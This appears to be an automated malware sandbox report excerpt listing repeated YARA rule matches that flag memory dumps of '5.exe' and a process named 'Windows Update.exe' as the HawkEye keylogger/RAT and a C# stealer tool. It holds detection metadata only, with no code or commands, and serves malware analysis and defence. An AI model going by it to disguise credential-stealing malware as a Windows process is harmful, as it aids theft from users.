          Source: 2.2.5.exe.3863258.6.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.3863258.6.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a26c92.50.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4a26c92.50.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a57e0d.29.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4a57e0d.29.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.19.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.19.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.19.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a56408.54.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4a56408.54.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4a56408.54.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.49cf428.28.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.49cf428.28.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.49cf428.28.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4a90000.12.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4a90000.12.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.4a90000.12.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a50000.30.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4a50000.30.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4a50000.30.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.415058.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.415058.2.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.415058.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.4a50000.15.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.4a50000.15.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.4a50000.15.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.4aadc72.14.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.4aadc72.14.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.75c0000.37.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.3863258.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.3863258.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.3863258.6.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.41b460.20.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.41b460.20.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.41b460.20.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.41ce65.17.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.41ce65.17.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.28cb12c.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.38c9660.23.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.38c9660.23.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.38c9660.23.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.5.exe.415058.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.1.5.exe.415058.3.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.1.5.exe.415058.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.38cb065.24.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.38cb065.24.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.5.exe.148b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 1.2.5.exe.148b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.49cf428.11.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.49cf428.11.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.49cf428.11.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.41b460.10.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.41b460.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.41b460.10.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.9.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.9.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.9.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4b3fa72.36.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4b3fa72.36.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4b7fa72.16.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4b7fa72.16.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.7610000.38.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.386b065.7.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.386b065.7.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a50000.30.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4a50000.30.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4a50000.30.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.415058.41.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.415058.41.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.41.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4aedc72.13.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4aedc72.13.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Windows Update.exe.147a0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 6.2.Windows Update.exe.147a0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 6.2.Windows Update.exe.147a0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.38c3258.25.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.38c3258.25.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.38c3258.25.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.3869660.5.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.3869660.5.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.3869660.5.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.5.exe.148a0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 1.2.5.exe.148a0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 1.2.5.exe.148a0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.49d0e2d.49.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.49d0e2d.49.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.1.Windows Update.exe.41ce65.2.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
